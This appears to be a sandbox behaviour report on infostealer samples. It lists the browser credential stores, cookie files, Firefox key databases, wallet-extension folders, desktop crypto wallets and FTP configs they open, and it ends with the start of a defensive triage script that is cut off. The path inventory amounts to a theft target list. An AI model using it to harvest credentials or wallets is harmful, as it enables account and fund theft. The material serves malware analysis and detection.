Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Roaming\FTPbox
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTP
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGL
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGL
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXA
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXA
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDB
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDB
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOH
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOH
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOY
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOY
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOH
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOH
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOY
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOY
                              Source: Yara matchFile source: 00000005.00000003.1097981161.000000000069D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000005.00000003.1098466251.000000000069D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: 2R0700.exe PID: 5204, type: MEMORYSTR
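The behaviour list above is the raw evidence of credential and wallet theft: both pwHxMTy.exe and 2R0700.exe walk browser profile stores (Login Data, Web Data, Network\Cookies, History), Firefox key material (key4.db, cert9.db, logins.json, cookies.sqlite), the Local Extension Settings directories of dozens of Chrome extensions, desktop wallet directories and FTP client configuration. The script below is an added triage example, not code from the report or from Joe Sandbox: it parses lines in this report's shape (tolerating the fused "…exeFile opened:" form and the trailing "Jump to behavior" link label that a copy-paste produces), classifies each accessed path, and scores each process by how many distinct secret-bearing categories it touched. The sample events are constructed from entries in this report; the extension-ID-to-wallet-name table is this example's own assumed mapping of public Chrome Web Store IDs and is not stated anywhere in the report.

```python
"""Triage sandbox file-access events into the categories an infostealer touches.

Added example. SAMPLE_EVENTS is constructed from entries in this report; the
WALLET_EXTENSIONS table is an assumed mapping of public Chrome Web Store IDs.
"""
import re
from collections import Counter, defaultdict

# Assumed mapping (not from the report): public Chrome Web Store IDs of wallet extensions.
WALLET_EXTENSIONS = {
    "nkbihfbeogaeaoehlefnkodbefgpgknn": "MetaMask",
    "bfnaelmomeimhlpmgjnjophhpkkoljpa": "Phantom",
    "ibnejdfjmmkpcnlpebklmnkoeoihofec": "TronLink",
    "hnfanknocfeofbddgcijnmhnfnkdnaad": "Coinbase Wallet",
    "egjidjbpglichdcondbcbdnbeeppgdph": "Trust Wallet",
    "fhbohimaelbohpjbbldcngcnapndodjp": "Binance Wallet",
    "dmkamcknogkgcdfhhbddcghachkejeap": "Keplr",
    "fnjhmkhhmkbjkkabndcnnogagogbneec": "Ronin Wallet",
}

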